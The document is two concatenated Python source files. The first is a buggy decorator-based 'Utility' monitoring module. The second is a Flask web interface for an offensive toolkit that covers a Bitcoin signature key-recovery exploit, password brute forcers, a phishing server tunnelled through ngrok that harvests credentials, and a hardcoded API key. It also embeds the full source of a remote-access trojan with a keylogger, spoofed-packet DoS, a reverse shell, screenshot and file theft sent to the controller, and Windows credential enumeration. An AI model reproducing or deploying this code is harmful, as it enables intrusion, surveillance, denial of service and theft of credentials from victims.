return func in Utility.getAllRegisteredUtilityFunctions(self_or_dict)
@staticmethod
def checkUtilityResult(utilityFunc, *args, **kwargs):
"""Evaluate a utility function's result against a specific evaluation function.
The evaluation function can be used to specify thresholds, but by default
uses the bool function. All callback info is removed before evaluation.
Arguments:
utilityFunc - the function to call to generate the result; the utility function
[evalFunc] - the evaluation function for utilityFunc's result
THIS MUST BE PASSED AS A KEYWORD ARG!
IT WILL GET POPPED BEFORE f IS EVALUATED; IT WILL NOT BE IN f's KWARGS!
Returns:
func_result - the function's, utilityFunc's, result
Raises:
Utility.UtilityError if utilityFunc's result fails the evaluation"""
evalFunc = kwargs.pop("evalFunc", bool)
#remove all callback related args:
cb = kwargs.pop("utilityCallback", None)
cb_args = kwargs.pop("utilityCallbackArgs", None)
func_result = utilityFunc(*args, **kwargs)
utility_result = evalFunc(func_result)
if not utility_result:
raise Utility.UtilityError
return func_result
@staticmethod
def handleCallback(*args, **kwargs):
"""Handle callbacks for Utility Exceptions.
This is mostly used internally for contexts, but can be used by developers.
Arguments (All must be passed via keyword arguments):
[utilityCallback] - the callback function; If not specified, no callback will take place
[utilityCallbackArgs] - arguments to pass to the callback function, if not specified,
the args pass to this handler will be used
Returns:
utilityCallback(utilityCallbackArgs)
Raises:
raise - if no callback is specified, a call to raise takes place.
This is because this is mostly used within contexts, where
this behavior makes sense (an exception within the user-defined block)"""
utilityCallback = kwargs.get("utilityCallback", None)
if utilityCallback:
utilityCallbackArgs = kwargs.get("utilityCallbackArgs", args)
return utilityCallback(*utilityCallbackArgs)
else:
raise
@staticmethod
def _dictOrGlobals(f, args):
"""This is used to establish scoping attributes
and is only intended to be used by utility and monitor decorators.
Arguments:
f - the function who needs to get access to _dictOrGlobals
in a decorator, this is the function passed in.
args - the list/tuple of args passed to a function/method
Returns:
self_dict - a dictionary that is either globals() or class/obj dict"""
#return len(args)>0 and hasattr(args[0], f.__name__) and args[0].__dict__ or globals()
if len(args) > 0 and hasattr(args[0], f.__name__):
return args[0].__dict__
return globals()
@staticmethod
def getAllRegisteredUtilityFunctions(self_or_dict=None):
"""Returns all utility functions within all given scopes.
Scope is determined by a function object passed in.
Arguments:
self_or_dict - the object's identity reference or the object's dictionary
Returns:
all_utils - list of all available utility functions"""
class_utils = []
if type(self_or_dict) is dict:
class_utils = self_or_dict.get("_utilityMethods", [])
else:
class_utils = hasattr(self_or_dict, "_utilityMethods") and self_or_dict._utilityMethods or []
glob_utils = globals().get("_utilityMethods", [])
all_utils = glob_utils + class_utils
return all_utils
@staticmethod
def registerAllGlobalUtilityFunctions():
"""Registers Global space utility functions
This is instead of runtime discovery"""
glob_dict = globals()
meths = glob_dict.setdefault("_utilityMethods", [])
for elem in glob_dict:
elem = glob_dict.get(elem)
if callable(elem) and Utility.isValidUtilityMethod(elem):
meths.append(elem)
@staticmethod
def sortUtilityFunctions(all_utils):
"""Sort out all pre, post, and concurrent utility functions
Arguments:
all_utils - a list of valid utility functions
Returns:
pre_utils, post_utils, concurrent_utils - lists of utility functions"""
if len(all_utils) < 1:
return [], [], []
util_funcs = filter(Utility.isValidUtilityMethod, all_utils)
pre_utils, post_utils, concurrent_utils = [], [], []
for func in util_funcs:
if func._utilitySpecs.get("pre", False):
pre_utils.append(func)
if func._utilitySpecs.get("post", False):
post_utils.append(func)
if func._utilitySpecs.get("concurrent", False):
conncurrent_utils.append(func)
return pre_utils, post_utils, concurrent_utils
## --- UTILITY DECORATORS --- ##
@staticmethod
def utility(f):
"""A decorator to mark a function or method as a utility method.
This is to be used with the @monitor decorator.
If a global function is decorated, it'll be available in global scope to all monitored methods.
If a method is decorated, it'll be available in class scope to monitored methods."""
@wraps(f)
def new_util_f(*args, **kwargs):
# Get the global dictionary or the class/obj dictionary...
self_dict = Utility._dictOrGlobals(f, args)
# Check to see if we're already recorded, if so, remove so we can re-add
if hasattr(self_dict, '_utilityMethods'):
if f in self_dict["_utilityMethods"]:
self_dict["_utilityMethods"].remove(f)
else:
# Since we're not recording utils, start
self_dict['_utilityMethods'] = []
self_dict["_utilityMethods"].append(f)
return f(*args, **kwargs)
new_util_f._utilitySpecs={"pre":True, "post":True, "concurrent":False}
return new_util_f
@staticmethod
def pre_utility(f):
"""A decorator to mark a function or method as a pre utility method.
See the utility method decorator for more information."""
pre_util_ret = utility(f)
pre_util_ret._utilitySpecs["post"] = False
return pre_util_return
@staticmethod
def post_utility(f):
"""A decorator to mark a function or method as a post utility method.
See the utility method decorator for more information."""
post_util_ret = utility(f)
post_util_ret._utilitySpecs["pre"] = False
return post_util_return
@staticmethod
def concurrent_utility(f):
"""A decorator to mark a function or method as a concurrent utility method.
See the utility method decorator for more information."""
con_util_ret = utility(f)
con_util_ret._utilitySpecs["pre"] = False
con_util_ret._utilitySpecs["post"] = False
con_util_ret._utilitySpecs["concurent"] = True
return con_util_return
## --- CONTEXTS --- ##
@staticmethod
@contextmanager
def contextUtility(utilityFunc, *args, **kwargs):
"""A context for block-wise utility.
This method will evaluate your function result with a keyword
arg passed function, evalFunc. If this is not passed in,
the function result is evaluted with bool. A Utility.UtilityError
is raised if the result fails the evaluation. Otherwise
the developer must raise UtilityError or some child thereof
within the function (for finer control)
Support for callbacks are via any callable object passed in as
a kwarg as 'utilityCallback'. Args to this callable can be passed
in as 'utilityCallbackArgs'. If no callback args are passed, the
arg list passed to the function will be passed onto the callback.
If the first utility check fails, a UtilityError will be yielded.
Arguments:
utilityFunc - a utility function used for evalutation,
This function does not have to be decorated as utility, it can be any function whatsoever
args - collection of args, passed to the function, utilityFunc
kwargs - a dictionary of keyword args, passed to the function, utilityFunc
Yields:
The result of the first evaluation of your function, utilityFunc
If the pre evaluated context fails, a UtilityError will be yielded; check for it!"""
has_yielded = False
try:
utility_result = Utility.checkUtilityResult(utilityFunc, *args, **kwargs)
yield utility_result
has_yielded = True
utility_result = Utility.checkUtilityResult(utilityFunc, *args, **kwargs)
except Utility.UtilityError:
Utility.handleCallback(*args, **kwargs)
if not has_yielded:
yield Utility.UtilityError("Your pre-evaluated context failed")
@staticmethod
@contextmanager
def contextPreUtility(utilityFunc, *args, **kwargs):
"""A context for block-wise pre-utility.
This method will evaluate your function result with a keyword
arg passed function, evalFunc. If this is not passed in,
the function result is evaluted with bool. A Utility.UtilityError
is raised if the result fails the evaluation. Otherwise
the developer must raise UtilityError or some child thereof
within the function (for finer control)
Support for callbacks are via any callable object passed in as
a kwarg as 'utilityCallback'. Args to this callable can be passed
in as 'utilityCallbackArgs'. If no callback args are passed, the
arg list passed to the function will be passed onto the callback.
If the first utility check fails, a UtilityError will be yielded.
Arguments:
utilityFunc - a utility function used for evalutation,
This function does not have to be decorated as utility, it can be any function whatsoever
args - collection of args, passed to the function, utilityFunc
kwargs - a dictionary of keyword args, passed to the function, utilityFunc
Yields:
The result of the first evaluation of your function, utilityFunc
If the pre evaluated context fails, a UtilityError will be yielded; check for it!"""
has_yielded = False
try:
utility_result = Utility.checkUtilityResult(utilityFunc, *args, **kwargs)
yield utility_result
has_yielded = True
except Utility.UtilityError:
Utility.handleCallback(*args, **kwargs)
if not has_yielded:
yield Utility.UtilityError("Your pre-evaluated context failed")
@staticmethod
@contextmanager
def contextPostUtility(utilityFunc, *args, **kwargs):
"""A context for block-wise post-utility.
This method will evaluate your function result with a keyword
arg passed function, evalFunc. If this is not passed in,
the function result is evaluted with bool. A Utility.UtilityError
is raised if the result fails the evaluation. Otherwise
the developer must raise UtilityError or some child thereof
within the function (for finer control)
Support for callbacks are via any callable object passed in as
a kwarg as 'utilityCallback'. Args to this callable can be passed
in as 'utilityCallbackArgs'. If no callback args are passed, the
arg list passed to the function will be passed onto the callback.
Arguments:
utilityFunc - a utility function used for evalutation,
This function does not have to be decorated as utility, it can be any function whatsoever
args - collection of args, passed to the function, utilityFunc
kwargs - a dictionary of keyword args, passed to the function, utilityFunc
Yields:
The result of the first evaluation of your function, utilityFunc"""
try:
yield utility_result
utility_result = Utility.checkUtilityResult(utilityFunc, *args, **kwargs)
except Utility.UtilityError:
Utility.handleCallback(*args, **kwargs)
@staticmethod
@contextmanager
def contextConcurrentUtility(utilityFunc, *args, **kwargs):
"""A context for block-wise concurrent-utility.
This method will evaluate your function result with a keyword
arg passed function, evalFunc. If this is not passed in,
the function result is evaluted with bool. A Utility.UtilityError
is raised if the result fails the evaluation. Otherwise
the developer must raise UtilityError or some child thereof
within the function (for finer control)
Support for callbacks are via any callable object passed in as
a kwarg as 'utilityCallback'. Args to this callable can be passed
in as 'utilityCallbackArgs'. If no callback args are passed, the
arg list passed to the function will be passed onto the callback.
Arguments:
utilityFunc - a utility function used for evalutation,
This function does not have to be decorated as utility, it can be any function whatsoever
args - collection of args, passed to the function, utilityFunc
kwargs - a dictionary of keyword args, passed to the function, utilityFunc
Yields:
concurrent utility thread start() status"""
try:
t = Thread(target=utilityFunc, name=f.__name__+"_ContextThread", args=args, kwargs=kwargs)
t.setDaemon(True)
yield t.start()
#TODO Kill the thread here, perhaps we need to make a new killable Thread class
# (or one that just returns the threads pid, so we can os.popen("kill %d"% t_pid)
# Ideally a coroutine setup would rock, or some single thread solution.
except:
Utility.handleCallback(*args, **kwargs)
## --- MONITOR DECORATOR --- ##
## ___ The Heart ___ ##
@staticmethod
def monitor(f, *utility_funcs):
"""Decorates methods or functions that should be monitored and verified
by utility functions (those decorated with @utility or similar)
Arguments:
*util_funcs - the utility functions that should monitor this operations
If absent or passed as None, ALL availble utility functions in class wide
and global scope will be used..
Notes:
If you monitor a global function, only global utility functions will be available
If you monitor a method, class wide and global utility functions are available"""
@wraps(f)
def new_monitor_f(*args, **kwargs):
meth_return = None
util_funcs = utility_funcs
if (util_funcs == ()) or (None in util_funcs):
if len(args) > 0 and f.__name__ in dir(args[0]):
util_funcs = Utility.getAllRegisteredUtilityFunctions(args[0])
else:
util_funcs = Utility.getAllRegisteredUtilityFunctions()
#Filter and sort the functions
pre_utils, post_utils, concurrent_utils = Utility.sortUtilityFunctions(util_funcs)
for func in pre_utils:
if not func(*args, **kwargs):
raise UtilityError("Pre-Utility failed for: %s" % func.__name__)
#TODO This needs to be replaced with killable threads or ideally a coroutine setup
# (or one that just returns the threads pid, so we can os.popen("kill %d"% t_pid)
for func in concurrent_utils:
t = Thread(target=func, name=func.__name__+"_ConncurrentUtilThread", args=args, kwargs=kwargs)
t.setDaemon(True)
t.start()
meth_return = f(*args, **kwargs)
for func in post_utils:
if not func(*args, **kwargs):
raise UtilityError("Post-Utility failed for: %s" % func.__name__)
return meth_return
return new_monitor_f
if __name__ == "__main__":
Utility.registerAllGlobalUtilityFunctions()
class TempObj(object):
__metaclass__ = RegisterUtilityMethods
@Utility.monitor
def testMonMeth(self):
print "utils1:", Utility.getAllRegisteredUtilityFunctions(self)
print "monitoring..."
@Utility.utility
def testMeth(self, arg1=1):
print "testMeth talking..."
return True
print "utils2:", Utility.getAllRegisteredUtilityFunctions()
to = TempObj()
to.testMonMeth()
@Utility.utility
def testFunc(arg1=1):
print "this is a function"
return True
testFunc()
print "utils:3", Utility.getAllRegisteredUtilityFunctions()
class TempObj2(object):
@Utility.utility
def testMeth(self, arg1=1):
print "testMeth2 talking..."
print "utils4:", Utility.getAllRegisteredUtilityFunctions(self)
return True
to2 = TempObj2()
to2.testMeth()
print "utils5:", Utility.getAllRegisteredUtilityFunctions()
def contextual_utility(arg1):
return arg1[1:]
with Utility.contextUtility(contextual_utility, [1,3,5], evalFunc=bool) as status:
print "your status is:", status
print "done"
|
SCPT_web_intf.py
|
from flask import Flask,render_template,request,send_file,Response,url_for
from btc_exploit import rsz_exploit, raw_tx
from google_dorking.google_dorl import GooGle_Dork
from vunlseac import cve, vlunse, gtfobins
from Phishing import test_cli22
import subprocess as sp
from os import system
import multiprocessing
from cryptography_me_she import aes, hashs, rsa, bases
from hash_Name.hash_name import HASH_Name
from hash_bruutefrocer.hash_brute import Hash_Brut
from payload import lick
from werkzeug.utils import secure_filename
import os
from brute.protcal_brutfroce import ftp, ssh
from brute.last_brutfroce import btc_1, etm_1
UPLOAD_FOLDER = '/home/shiky/cp2/temp/testing'
filename=""
ALLOWED_EXTENSIONS = {'txt', 'cve', 'list', 'lst', 'text', 'passwd'}
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
@app.route('/')
def index():
return render_template("index2.html")
@app.route('/btc.html')
def btc():
return render_template("btc.html")
@app.route('/btc.html', methods =["GET", "POST"])
def btc_row():
transion = request.form.get("transcation_p")
if (transion == None ):
return btc_exploit()
else:
RX = raw_tx.Get_RAW_TX()
RX_Output: str = RX.raw_txt(str(transion))
print(RX_Output)
return render_template("btc.html", rowTran=str(RX_Output))
@app.route('/btc.html', methods =["GET", "POST"])
def btc_exploit():
r: str = str(request.form.get("R"))
s1: str = str(request.form.get("S1"))
z1: str = str(request.form.get("Z1"))
s2: str = str(request.form.get("S2"))
z2: str = str(request.form.get("Z2"))
address: str = str(request.form.get("Adress"))
if (r == None and s1 == None and s2 == None and z1 == None and z2 == None):
return btc_row()
else:
RSz = rsz_exploit.RSZ_EXploit()
RSz_out: Set[str] = RSz.exploit(address, r, s1, s2, z1, z2)
print(RSz_out)
return render_template("btc.html", RSz_out=str(RSz_out))
@app.route('/cryptograpy.html')
def cryptograpy():
return render_template("cryptograpy.html")
@app.route('/cryptograpy.html', methods =["GET", "POST"])
def crptoengolll():
en_de=str(request.form.get('endeotype'))
# crptot=str(request.form.get('crptotype'))
crptofun=str(request.form.get('functiomtype'))
key=str(request.form.get('keys'))
msg=str(request.form.get('massg'))
if(en_de=="en"):
if(crptofun=="AES"):
ke1 = key
if (len(ke1) == 16):
key = bytes(ke1, 'ascii')
else:
print("key size most be 16 ")
os._exit(0)
plantxt: str = msg
AES_ED = aes.AES_CG()
a: List[bytes] = AES_ED.encrp(plantxt, key)
key: bytes = a[0]
ciph: bytes = a[1]
outp="encoded= "+ str(ciph)[1:] +"\nkey= "+ str(key)[1:]
return render_template("cryptograpy.html", crotpmassg=outp)
elif(crptofun=="RSA"):
CP = msg
RS = rsa.RSA_CG()
keys = RS.gneKeys()
# print(keys, '\n')
enc = str(RS.encodme(CP, keys["pubkey"]))[1:]
# print("encode= ", enc)
outp=str(keys["privKey"])+"\nencode= "+ enc
return render_template("cryptograpy.html", crotpmassg=outp)
elif("base"in crptofun):
BOutput: str = BS.base_encde(crptofun, msg)
return render_template("cryptograpy.html", crotpmassg=BOutput)
else:
HA = hashs.Hashing()
hash: str = HA.hashing(crptofun, msg)
return render_template("cryptograpy.html", crotpmassg=hash)
elif(en_de=="den"):
if (crptofun == "AES"):
ciph = bytes(msg, 'ascii')
key = bytes(key, 'ascii')
try:
AES_ED = aes.AES_CG()
dec: str = AES_ED.decp(ciph, key)
outp = "decode= " + dec
return render_template("cryptograpy.html", crotpmassg=outp)
except e:
return render_template("cryptograpy.html", crotpmassg="wrong key")
elif (crptofun == "RSA"):
enc=msg
key=key
RS = rsa.RSA_CG()
# dec = str(RS.decome(enc, keys["privKey"]))[1:]
dec = str(RS.decome(enc, key))[1:]
print("decode= ", dec)
outp="decode= "+ dec
return render_template("cryptograpy.html", crotpmassg=outp)
elif ("base" in crptofun):
BOutput = BS.base_dencde(crptofun, msg)
return render_template("cryptograpy.html", crotpmassg=BOutput)
# else:
# return render_template("cryptograpy.html")
else:
return shoipk()
@app.route('/cryptograpy.html', methods =["GET", "POST"])
def shoipk():
# print("ho")
hash2: str = str(request.form.get('hashingop'))
hash: str = str(request.form.get('hash_n'))
if (hash2 == "None" and hash !=None):
return hash_brute_go()
else:
HN2 = HASH_Name()
Houtput2: str = HN2.hahs_type(hash2)
return render_template("cryptograpy.html", hashnameopppp=str(Houtput2))
@app.route('/cryptograpy.html', methods =["GET", "POST"])
def hash_brute_go():
types: str = str(request.form.get('hash_type'))
hash: str = str(request.form.get('hash_n'))
HBrut = Hash_Brut()
HB_Output: str = HBrut.hashdecod(types, hash)
return render_template("cryptograpy.html", hashop=HB_Output)
@app.route('/google_dork.html')
def google_dork():
return render_template("google_dork.html")
@app.route('/google_dork.html', methods =["GET", "POST"])
def google_dokout():
search: str = str(request.form.get('searching'))
dork: str = str(request.form.get('dorker'))
GD = GooGle_Dork()
GD_Output: str = GD.dork(search, dork)
print(GD_Output)
return render_template("google_dork.html", googleOut=str(GD_Output))
@app.route('/port_scan.html')
def port_scan():
return render_template("port_scan.html")
@app.route('/port_scan.html', methods =["GET", "POST"])
def port_go():
from port_scanner import port_scan
target: str = str(request.form.get('targging'))
port: str = str(request.form.get('portal'))
option = 2
if port =="all":
option = 1
timeoutes_str = ""
LPSOutput0kop = []
print("here",option,port)
if option == 2:
if (',' in target):
sv: List[str] = target.split(',')
for i in sv:
print("target: " + str(i.strip(' ')))
LPSOutput0kop.append(str("target: " + str(i.strip(' '))))
PS = port_scan.PORT_SCAN(i.strip(' '))
if timeoutes_str == "":
if (',' in port):
PoS: List[str] = port.split(',')
for PK in PoS:
Pi: int = int(PK.strip(' '))
LPSOutput01: str = PS.scan_port(PS.target_p_ip, Pi)
if LPSOutput01 == None:
pass
else:
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
else:
Pi: int = int(port.strip(' '))
LPSOutput01: str = PS.scan_port(PS.target_p_ip, Pi)
if LPSOutput01 == None:
pass
else:
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
else:
PS = port_scan.PORT_SCAN(target)
print("target: " + str(target))
if timeoutes_str == "":
if (',' in port):
PoS: List[str] = port.split(',')
for pk in PoS:
# print("here2")
Pi: int = int(pk.strip(' '))
LPSOutput01: str = PS.scan_port(PS.target_p_ip, Pi)
if LPSOutput01 == None:
pass
else:
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
else:
Pi: int = int(port.strip(' '))
LPSOutput01: str = PS.scan_port(PS.target_p_ip, Pi)
if LPSOutput01 == None:
pass
else:
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
else:
# print("here1")
if (',' in port):
# print("here")
PoS: List[str] = port.split(',')
for pk in PoS:
Pi: int = int(pk.strip(' '))
LPSOutput01 = PS.scan_port(PS.target_p_ip, Pi, float(timeoutes_str))
if LPSOutput01 == None:
pass
else:
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
else:
# print("here1")
Pi: int = int(port.strip(' '))
LPSOutput01 = PS.scan_port(PS.target_p_ip, Pi, float(timeoutes_str))
if LPSOutput01 == None:
pass
else:
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
else:
if (',' in target):
sv = target.split(',')
for i in sv:
print("target: " + str(i.strip(' ')))
LPSOutput0kop.append(str("target: " + str(i.strip(' '))))
PS = port_scan.PORT_SCAN(i.strip(' '))
if timeoutes_str == "":
LPSOutput01 = PS.Scan_All_Ports()
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
else:
PS = port_scan.PORT_SCAN(target)
print("target: " + str(target))
if timeoutes_str == "":
LPSOutput01 = PS.Scan_All_Ports()
print(LPSOutput01)
LPSOutput0kop.append(LPSOutput01)
soutping=""
if LPSOutput0kop == None:
pass
else:
for out in LPSOutput0kop:
soutping+=str(out)+"\n"
return render_template("port_scan.html", porting=str(soutping))
# @app.route('/web_scan.html')
# def web_scan():
# return render_template("web_scan.html")
@app.route('/vuln_search.html')
def vuln_search():
return render_template("vuln_search.html")
@app.route('/vuln_search.html', methods =["GET", "POST"])
def vuln_go():
search: str = str(request.form.get('servicetx'))
vuln_type: str = str(request.form.get('vulnapi'))
vunlout=""
if vuln_type == "vunldb":
api_key: str = "66a0565094d918c985d5de682c87606b"
# service: str = "ssh 2"
VS = vlunse.Vulnerability_Search()
bug: List[str] = VS.vuln_search(search, api_key)
vunlout=bug
elif vuln_type == "CVE":
# search: str = "5.10.0 kali7"
# search: str = "vsFTPd 2.3.4"
CV = cve.CVE_Search()
d: Dict[str, str] = CV.cve_search(search.replace(' ', '+'))
vunlout=d
elif vuln_type == "gtfobin":
# search: str = "nmap"
# dork:int=3
GD = gtfobins.GooGle_Dork()
GD_Output: str = GD.dork(search)
vunlout=GD_Output
return render_template("vuln_search.html", vunlout=str(vunlout))
@app.route('/phishing.html')
def phishing():
return render_template("phishing.html")
@app.route('/phishing.html', methods =["GET", "POST"])
def phishinggo():
page: str = str(request.form.get('page'))
ptype:str= str(request.form.get('ptype'))
rdurl:str = str(request.form.get('redurl'))
dirk: str = str(sp.getoutput('pwd'))
if ("/Phishing" not in dirk):
dirk += "/Phishing"
try:
PHish = test_cli22.Phishing_cli()
PHish.check_need()
PHish.runPhishing(page, ptype,PHish.dirk)
PHish.inputCustom(rdurl, dirk)
port = 56
PHish.runServer(port)
url = PHish.runNgrok(port, dirk)
print(url)
while True:
multiprocessing.Process(target=PHish.runServer, args=(port,)).start()
out = PHish.getCredentialsWEB()
for i in out:
return render_template("phishing.html", phingurl=url, phinshingout=i)
except KeyboardInterrupt:
system('sudo pkill ngrok')
@app.route('/payload.html')
def payload():
return render_template("payload.html")
@app.route('/payload.html', methods =["GET", "POST"])
def paylod_go_connect_sh():
ip: str = str(request.form.get('ips'))
port: str = str(request.form.get('ports'))
if request.form.get('listening') == 'listening':
print("listening pressed")
# host = str(self.lineEdit2.text())
port = int(port)
global rv
rv = lick.revab(ip, port)
rv.getconnections()
rv.allin()
address = rv.allAddress
ad="connections:\n"
for i in address:
ad+=str([i[0] + ":" + str(i[1])])+"\n"
return render_template("payload.html", targetstoconnct=ad)
elif request.form.get('genrating') == 'genrating':
print("genrating pressed")
payload_strick = """
import os, json, subprocess, sys, threading, random, socket
from urllib.request import Request, urlopen
try:
from pynput.keyboard import Listener
from PIL import ImageGrab
from scapy.all import *
except:
os.system("pip install PIL")
os.system("pip install pynput")
os.system("pip install scapy")
from pynput.keyboard import Listener
from PIL import ImageGrab
from scapy.all import *
keys = []
count = 0
# path_windos = "\\\Keyloags.txt"
path_unix = "/tmp/keyloags.txt"
if "nt" in os.name:
p = subprocess.Popen("powershell $env:TEMP", shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
output = p.stdout.read()
output = output.decode()
o = output.replace(" ", "").replace("\\r", "").replace("\\n", "").replace("'", "").replace("Path", "").replace("--","")
path_unix = o + "\\\keyloags.txt"
else:
path_unix = "/tmp/keyloags.txt"
global flage
flage = 0
def write_file(keys):
with open(path_unix, "a") as wfile:
for key in keys:
k = str(key).replace("'", "")
if (k.find("backspace") > 0):
wfile.write(" Backspace ")
elif (k.find("enter") > 0):
wfile.write("\\n")
elif (k.find("shift") > 0):
wfile.write(" Shift ")
elif (k.find("space") > 0):
wfile.write(" ")
elif (k.find("caps_lock") > 0):
wfile.write(" Caps_lock ")
elif (k.find("up") > 0):
wfile.write(" Key.up ")
elif (k.find("down") > 0):
wfile.write(" Key.down ")
elif (k.find("right") > 0):
wfile.write(" Key.right ")
elif (k.find("lefts") > 0):
wfile.write(" Key.lefts ")
elif (k.find("ctrl_r") > 0):
wfile.write(" Key.ctrl_r ")
elif (k.find("tab") > 0):
wfile.write(" Key.tab ")
elif (k.find("alt") > 0):
wfile.write(" Key.alt ")
elif (k.find("key")):
wfile.write(k)
def on_press(key):
global keys, count
keys.append(key)
count += 1
if (count >= 1):
count = 0
write_file(keys)
keys = []
def key_logs():
os.remove(path_unix)
global listener
with Listener(on_press=on_press) as listener:
listener.join()
def stop_key_log():
flage = 1
listener.stop()
upload_file(path_unix)
def dos(target_IP, stop):
# target_IP = input("Enter IP address of Target: ")
i = 1
while True:
a = str(random.randint(1, 254))
b = str(random.randint(1, 254))
c = str(random.randint(1, 254))
d = str(random.randint(1, 254))
dot = "."
Source_ip = a + dot + b + dot + c + dot + d
for source_port in range(1, 65535):
IP1 = IP(source_IP=Source_ip, destination=target_IP)
TCP1 = TCP(srcport=80, dstport=80)
pkt = IP1 / TCP1
send(pkt, inter=.001)
connt.send("packet sent " + str(i))
i = i + 1
if (stop == i):
break
def full_shell():
# print(port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.connect((host, port + 1));
# reliable_send(li)
os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);
if "nt" in os.name:
p = subprocess.call(["cmd.exe", ""]);
else:
p = subprocess.call(["/bin/sh", "-i"]);
def screen_shoter():
screen_shot = ImageGrab.grab()
if "nt" in os.name:
p = subprocess.Popen("powershell $env:TEMP", shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
output = p.stdout.read()
output = output.decode()
o = output.replace(" ", "").replace("\\r", "").replace("\\n", "").replace("'", "").replace("Path", "").replace(
"--", "")
screen_shot.save(o + "\\\screep.png")
else:
screen_shot.save("/temp/screep.png")
def upload_file(file_name):
f = open(file_name, "rb")
connt.send(f.read())
def download_file(file_name):
k = "/"
if "nt" in os.name:
k = "\\\\"
else:
k = "/"
c = 0
while True:
if ("/" in k or "\\\\" in k):
k = file_name[c:]
c += 1
# print("her", k)
# print(c)
else:
break
# print(k)
f = open(k, "wb")
# print('kkkk')
connt.settimeout(1)
chunk = connt.recv(1024)
while chunk:
f.write(chunk)
try:
chunk = connt.recv(1024)
except socket.timeout as e:
break
connt.settimeout(None)
f.close()
def relaible_recv():
data = ''
while True:
try:
data = data + connt.recv(1024).decode().rstrip()
return json.loads(data)
except ValueError:
continue
def reliable_send(data):
jsondata = json.dumps(data)
connt.send(jsondata.encode())
def shell_do():
while True:
command = relaible_recv()
# print(command)
if (command == "exit"):
break
# if (command == ""):
# pass
elif (command == "stkeylog"):
t = threading.Thread(target=key_logs)
t.start()
reliable_send("key loger is started")
# while flage !=1:
# stop_key_log()
elif (command == "spkeylog"):
# t = threading.Thread(taget=key_logs)
# t.start()
# while flage !=1:
stop_key_log()
t.join()
elif (command[:3] == "dos"):
comm = command[4:]
t_ip = str(comm[0:comm.find(" ")])
stop_at = int(comm[comm.find(" "):].replace(" ", "")) + 1
dos(t_ip, stop_at)
elif (command == "screenshoot"):
screen_shoter()
if "nt" in os.name:
p = subprocess.Popen("powershell $env:TEMP", shell=False, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = p.stdout.read()
output = output.decode()
o = output.replace(" ", "").replace("\\r", "").replace("\\n", "").replace("'", "").replace("Path",
"").replace(
"--", "")
upload_file(o + "\\\screep.png")
else:
upload_file("/temp/screep.png")
elif (command[:6] == "upload"):
download_file(command[7:])
elif (command[:8] == "download"):
reliable_send(command)
upload_file(command[9:])
# time.sleep(4)
elif (command == "shell"):
# while command == "" or command == "shell" or command == None:
t2 = threading.Thread(target=full_shell)
t2.start()
t2.join()
elif (command == "enum"):
if "nt" in os.name:
print("windows")
f = '''echo #########user info > %temp%\\\winenumoutp22.txt
echo ##################Hostname >> %temp%\\\winenumoutp22.txt
hostname >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ##################whoami >> %temp%\\\winenumoutp22.txt
whoami >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ##################echo %%USERNAME%% >> %temp%\\\winenumoutp22.txt
echo %USERNAME% >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ##################net users >> %temp%\\\winenumoutp22.txt
net users >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ##################net user %%USERNAME%% >> %temp%\\\winenumoutp22.txt
net user %USERNAME% >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ################## systeminfo >> %temp%\\\winenumoutp22.txt
systeminfo >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ################## fsutil fsinfo drives >> %temp%\\\winenumoutp22.txt
fsutil fsinfo drives >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ################## path >> %temp%\\\winenumoutp22.txt
echo %PATH% >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ################## tasklist /SVC >> %temp%\\\winenumoutp22.txt
tasklist /SVC >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo ################## Checking if .msi files are always installed with elevated privlidges>> %temp%\\\winenumoutp22.txt
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated /v AlwaysInstallElevated >> %temp%\\\winenumoutp22.txt
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated /v AlwaysInstallElevated >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo #### Checking for backup SAM files >> %temp%\\\winenumoutp22.txt
echo #### dir %SYSTEMROOT%\\repair\SAM >> %temp%\\\winenumoutp22.txt
dir %%SYSTEMROOT%%\\repair\SAM >> %temp%\\\winenumoutp22.txt
echo #### dir %SYSTEMROOT%\system32\config\\regback\SAM >> %temp%\\\winenumoutp22.txt
dir %%SYSTEMROOT%%\system32\config\\regback\SAM >> %temp%\\\winenumoutp22.txt
echo. >> %temp%\\\winenumoutp22.txt
echo #### USES AccessChk from sysinternals >> %temp%\\winenumoutp22.txt
accesschk.exe -uwcqv "Authenticated Users" * /accepteula >> %temp%\\winenumoutp22.txt
accesschk.exe -uwcqv "Users" * /accepteula >> %temp%\\winenumoutp22.txt
accesschk.exe -uwcqv "Everyone" * /accepteula >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
echo ################## Checking for possible creds >> %temp%\\winenumoutp22.txt
echo ################## type c:\sysprep.inf >> %temp%\\winenumoutp22.txt
type c:\sysprep.inf >> %temp%\\winenumoutp22.txt
echo. >> %temp%\\winenumoutp22.txt
